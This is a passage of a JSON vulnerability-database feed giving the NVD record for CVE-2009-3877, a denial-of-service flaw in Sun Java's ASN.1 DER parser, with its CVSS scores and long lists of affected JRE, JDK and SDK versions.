"cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Unspecified vulnerability in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 
1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to cause a denial of service (memory consumption) via crafted HTTP headers, which are not properly parsed by the ASN.1 DER input stream parser, aka Bug Id 6864911.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3877", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3877"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:sdk:1.4.2_23", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", 
"cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", 
"cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3877", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update4:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", 